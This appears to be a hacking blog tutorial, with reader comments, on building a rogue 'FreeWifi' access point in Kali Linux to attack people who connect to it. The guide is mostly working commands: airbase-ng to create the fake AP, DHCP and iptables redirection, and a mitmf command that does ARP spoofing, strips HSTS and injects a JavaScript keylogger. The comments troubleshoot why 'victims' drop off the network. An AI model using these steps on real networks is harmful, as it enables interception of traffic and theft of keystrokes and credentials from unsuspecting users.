img

Create Rogue Access Point For Attack In Kali Linux

/
/
/
2004 Views

A rogue access point (also called rogue AP), is any Wi-Fi access point that is installed on a network but is not authorized for operation on that network and is not under the management of the network administrator. Rogue access points often do not conform to wireless LAN (WLAN) security policies, and additionally, can allow anyone with a Wi-Fi device to connect to your network. So, Learn How To Create Rogue Access Point For Attack In Kali Linux.

Create Rogue Access Point For Attack In Kali Linux

Let’s Understand The Rogue Access Point With Infographics

rogue access point

Steps To Create Rogue Access Point For Attack In Kali Linux

1. Install isc-dhcp-server

apt-get install isc-dhcp-server

2. set monitor mode

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

3. Configure dhcpd.conf

leafpad /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name “FreeWifi”;
option domain-name-servers 61.XXX.XXX.1,61.XXX.XXX.1,192.168.1.1;
range 192.168.2.100 192.168.2.110;
}

4. Create fake AP using airbase-ng

airbase-ng -e FreeWifi -c 6 wlan0mon

5. Configure at0 interface

ifconfig at0 up
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

6. Start DHCP Server

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

7. Run mitmf

mitmf -i at0 –spoof –arp –gateway 192.168.2.1 –jskeylogger –hsts

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best way to Create Rogue Access Point For Attack. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

  • Facebook
  • Twitter
  • Google+
  • Linkedin
  • Pinterest

6 Comments

  1. Hello HACKAGON, I’m having a issue, it creates the fake ap but when I try connecting to it with a smart phone or computer it doesn’t connect, a another problem I have seen is that when I try to make a MITM attack with ettercap-g GUI it just disconnects the user out of Internet, basically all network attacks do not work. I’m working with the correct chipset (Ralink Technology, Corp. RT2870/RT3070) and wireless card (signal king sk-10tn), what could the problem be? A bad configuration on my computer?

    • May be you’re not doing the steps correctly, and also sometimes it defers according to the different configuration of the device. So, I suggest! do the steps carefully once.

          • Hi HACKAGON. Currently I’m having an issue. After i created a Fake AP, the WiFi is visible but when any victim try to connect to the Fake AP, it able to connects but just for few seconds and it disconnected. When i check airodump-ng wlan0mon, i realized that the CH for the Fake AP keeps changing. Is that could be the problem?

          • It may be because of several things.

            1 – Maybe nm is causing problem (but this will usually occur when there is a connection on a different channel)

            2 – The commands were issued wrong.

            3 – You does not have injection capable drivers

Leave a Reply to HACKAGON Cancel reply